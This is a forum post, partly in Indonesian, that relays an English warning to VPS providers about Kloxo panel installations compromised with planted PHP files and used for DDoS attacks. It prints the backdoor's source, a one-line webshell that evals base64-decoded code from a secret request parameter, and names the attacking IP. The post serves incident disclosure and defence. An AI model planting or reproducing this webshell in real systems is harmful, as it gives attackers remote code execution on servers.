FluidaWeb
Hosting Guru
Info bagi para pemakai kloxo dan vps provider, jika kloxo banyak compromised yg digunakan untuk DDOS, saya baca bnyak VPS provider melakukan suspend massal krn hal ini. Jadi silahkan di cek bagi para VPS provider mungkin secara diam2 servernya melakukan DDOS
Saya tidak tahu apa ini juga ada padaKloxo MR
Ini info dr forum luar yg lagi rame:
We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.
Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.
UPDATE: default.php in the same directory will also be compromised. See source here:http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=
This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):
Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.
All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)
Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's effected Ramnode, if not others. Beware!
Saya tidak tahu apa ini juga ada padaKloxo MR
Ini info dr forum luar yg lagi rame:
We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.
Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.
UPDATE: default.php in the same directory will also be compromised. See source here:http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=
This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):
Code:
<?php > set_time_limit(0);error_reporting(NULL); > if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));} > else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\">Access denied.';} > ?>
All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)
Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's effected Ramnode, if not others. Beware!